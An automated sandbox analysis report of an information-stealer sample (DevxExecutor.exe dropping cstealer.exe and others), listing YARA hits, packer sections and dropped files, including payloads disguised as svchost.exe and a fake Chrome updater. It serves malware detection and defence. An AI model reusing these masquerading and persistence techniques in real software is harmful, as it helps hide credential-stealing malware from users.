                                Source: Binary string: D:\_w\1\b\bin\amd64\unicodedata.pdb source: cstealer.exe, 00000002.00000003.2167928555.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2194731679.0000014E6F9D4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2454876358.00007FF8A8020000.00000002.00000001.01000000.00000030.sdmp
                                Source: Binary string: D:\_w\1\b\bin\amd64\_hashlib.pdb source: cstealer.exe, 00000002.00000003.2161490405.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2188096980.0000014E6F9D3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2536033958.00007FF8B8017000.00000002.00000001.01000000.0000002C.sdmp
                                Source: Binary string: D:\_w\1\b\bin\amd64\_lzma.pdb source: cstealer.exe, 00000002.00000003.2161593775.0000024728B92000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2188225696.0000014E6F9D3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2544890205.00007FF8B814C000.00000002.00000001.01000000.00000022.sdmp
                                Source: Binary string: D:\_w\1\b\bin\amd64\python311.pdb source: main.exe, 00000008.00000002.2222098181.00007FF8A8CCB000.00000040.00000001.01000000.0000001A.sdmp, cstealer.exe, 00000009.00000002.2497830571.00007FF8A86FB000.00000002.00000001.01000000.0000001C.sdmp
                                Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: cstealer.exe, 00000009.00000002.2476831702.00007FF8A8300000.00000002.00000001.01000000.0000002B.sdmp

                                Data Obfuscation

                                barindex
                                Yara detected Costura Assembly Loader
                                Source: Yara matchFile source: 46.0.main.exe.16132da05b8.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 46.0.main.exe.16132c3ef04.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 46.0.main.exe.16132c30000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000002E.00000002.2512314562.0000016135011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000003.2310472358.000000000799E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002E.00000000.2340574067.0000016132C32000.00000002.00000001.01000000.0000005E.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\ProgramData\main.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
                                Source: VCRUNTIME140.dll.2.drStatic PE information: 0xEFFF39AD [Sun Aug 4 18:57:49 2097 UTC]
                                Source: C:\Users\user\AppData\Local\Temp\main.exeCode function: 8_2_00007FF8A8F28610 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,8_2_00007FF8A8F28610
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeFile created: C:\ProgramData\Microsoft\__tmp_rar_sfx_access_check_7312906Jump to behavior
                                Source: main.exe.0.drStatic PE information: section name: _RDATA
                                Source: cstealer.exe.0.drStatic PE information: section name: _RDATA
                                Source: libcrypto-1_1.dll.2.drStatic PE information: section name: .00cfg
                                Source: libssl-1_1.dll.2.drStatic PE information: section name: .00cfg
                                Source: python311.dll.2.drStatic PE information: section name: PyRuntim
                                Source: VCRUNTIME140.dll.2.drStatic PE information: section name: _RDATA
                                Source: Build.exe.4.drStatic PE information: section name: .didat
                                Source: VCRUNTIME140.dll.4.drStatic PE information: section name: _RDATA
                                Source: VCRUNTIME140.dll.7.drStatic PE information: section name: _RDATA
                                Source: libcrypto-1_1.dll.7.drStatic PE information: section name: .00cfg
                                Source: libssl-1_1.dll.7.drStatic PE information: section name: .00cfg
                                Source: python311.dll.7.drStatic PE information: section name: PyRuntim
                                Source: C:\Users\user\Desktop\DevxExecutor.exeCode function: 0_2_00007FF848F000BD pushad ; iretd 0_2_00007FF848F000C1
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00000271DC65ACDD push rcx; retf 003Fh3_2_00000271DC65ACDE
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00000271DC68C6DD push rcx; retf 003Fh3_2_00000271DC68C6DE
                                Source: C:\Windows\System32\cmd.exeCode function: 5_2_00000230D90FACDD push rcx; retf 003Fh5_2_00000230D90FACDE
                                Source: C:\Windows\System32\cmd.exeCode function: 5_2_00000230D922C6DD push rcx; retf 003Fh5_2_00000230D922C6DE
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 7_2_0000014E7126ACDD push rcx; retf 003Fh7_2_0000014E7126ACDE
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 7_2_0000014E7129C6DD push rcx; retf 003Fh7_2_0000014E7129C6DE
                                Source: initial sampleStatic PE information: section name: UPX0
                                Source: initial sampleStatic PE information: section name: UPX1
                                Source: initial sampleStatic PE information: section name: UPX0
                                Source: initial sampleStatic PE information: section name: UPX1
                                Source: initial sampleStatic PE information: section name: UPX0
                                Source: initial sampleStatic PE information: section name: UPX1
                                Source: initial sampleStatic PE information: section name: UPX0
                                Source: initial sampleStatic PE information: section name: UPX1
                                Source: initial sampleStatic PE information: section name: UPX0
                                Source: initial sampleStatic PE information: section name: UPX1
                                Source: initial sampleStatic PE information: section name: UPX0
                                Source: initial sampleStatic PE information: section name: UPX1
                                Source: initial sampleStatic PE information: section name: UPX0
                                Source: initial sampleStatic PE information: section name: UPX1
                                Source: initial sampleStatic PE information: section name: UPX0
                                Source: initial sampleStatic PE information: section name: UPX1
                                Source: initial sampleStatic PE information: section name: UPX0
                                Source: initial sampleStatic PE information: section name: UPX1

                                Persistence and Installation Behavior

                                barindex
                                Drops PE files with benign system names
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeFile created: C:\ProgramData\svchost.exeJump to dropped file
                                Found pyInstaller with non standard icon
                                Source: C:\Users\user\AppData\Local\Temp\main.exeProcess created: "C:\Users\user\AppData\Local\Temp\main.exe"
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI38562\charset_normalizer\md__mypyc.cp311-win_amd64.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI11282\libffi-8.dllJump to dropped file
                                Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI47682\_lzma.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77882\python311.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\_pytransform.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI11282\_queue.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI11282\charset_normalizer\md.cp311-win_amd64.pydJump to dropped file
                                Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI14722\_queue.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI53642\_socket.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI86682\_bz2.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI86682\_sqlite3.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\VCRUNTIME140.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI38562\_lzma.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI86682\_socket.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\nacl\_sodium.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI38562\_socket.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                                Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI11282\charset_normalizer\md__mypyc.cp311-win_amd64.pydJump to dropped file
                                Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI14722\_bz2.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI11282\python311.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77882\_ctypes.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\_bz2.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeFile created: C:\ProgramData\Microsoft\based.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI53642\charset_normalizer\md__mypyc.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\Desktop\DevxExecutor.exeFile created: C:\Users\user\AppData\Local\Temp\cstealer.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77882\_decimal.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\python310.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI11282\select.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI53642\_sqlite3.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI86682\python311.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI86682\_decimal.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77882\charset_normalizer\md__mypyc.cp311-win_amd64.pydJump to dropped file
                                Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI14722\_ctypes.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI38562\_sqlite3.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI11282\_ctypes.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI53642\_ctypes.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI86682\sqlite3.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77882\libcrypto-1_1.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI86682\libssl-1_1.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI53642\libffi-8.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\_queue.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI11282\_hashlib.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI38562\sqlite3.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI86682\unicodedata.pydJump to dropped file
                                Source: C:\ProgramData\main.exeFile created: C:\Users\user\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dllJump to dropped file
                                Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI14722\VCRUNTIME140.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77882\_socket.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI86682\charset_normalizer\md.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI53642\libcrypto-1_1.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI86682\_ssl.pydJump to dropped file
                                Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI47682\python310.dllJump to dropped file
                                Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI14722\_sqlite3.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI53642\python311.dllJump to dropped file
                                Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI14722\select.pydJump to dropped file
                                Source: C:\ProgramData\main.exeFile created: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77882\charset_normalizer\md.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI38562\_bz2.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI11282\libssl-1_1.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI53642\select.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\_bz2.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI11282\VCRUNTIME140.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\_decimal.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\select.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI11282\_lzma.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI38562\VCRUNTIME140.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI86682\_lzma.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\_cffi_backend.cp310-win_amd64.pydJump to dropped file
                                Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI14722\libssl-1_1.dllJump to dropped file
                                Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI47682\_hashlib.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI53642\_decimal.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\_lzma.pydJump to dropped file
                                Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI47682\_socket.pydJump to dropped file
                                Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI47682\VCRUNTIME140.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI38562\charset_normalizer\md.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI11282\unicodedata.pydJump to dropped file
                                Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI47682\unicodedata.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77882\_sqlite3.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77882\_ssl.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI86682\_hashlib.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\python311.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\_ssl.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77882\libssl-1_1.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI86682\charset_normalizer\md__mypyc.cp311-win_amd64.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\_socket.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77882\select.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI53642\charset_normalizer\md.cp311-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI11282\_bz2.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\_hashlib.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI11282\_decimal.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI11282\sqlite3.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\python3.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI53642\_ssl.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                                Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI47682\_bz2.pydJump to dropped file
                                Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI14722\libffi-8.dllJump to dropped file
                                Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI14722\rar.exeJump to dropped file
                                Source: C:\Users\user\Desktop\DevxExecutor.exeFile created: C:\Users\user\AppData\Local\Temp\main.exeJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI11282\_sqlite3.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI86682\_queue.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI38562\_hashlib.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\wrapt\_wrappers.cp310-win_amd64.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\select.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\bcrypt\_bcrypt.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI86682\libffi-8.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\libcrypto-1_1.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeFile created: C:\ProgramData\setup.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77882\VCRUNTIME140.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI11282\libcrypto-1_1.dllJump to dropped file
                                Source: C:\ProgramData\setup.exeFile created: C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmpJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\pyexpat.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\libffi-7.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\unicodedata.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI86682\libcrypto-1_1.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI11282\_ssl.pydJump to dropped file
                                Source: C:\ProgramData\setup.exeFile created: C:\Program Files\Google\Chrome\updater.exeJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI38562\select.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI53642\_queue.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77882\libffi-8.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77882\sqlite3.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI38562\libcrypto-1_1.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI38562\_ssl.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\_brotli.cp310-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI86682\VCRUNTIME140.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI53642\_hashlib.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77882\_lzma.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI53642\_bz2.pydJump to dropped file
                                Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI47682\_decimal.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI38562\python311.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI53642\unicodedata.pydJump to dropped file
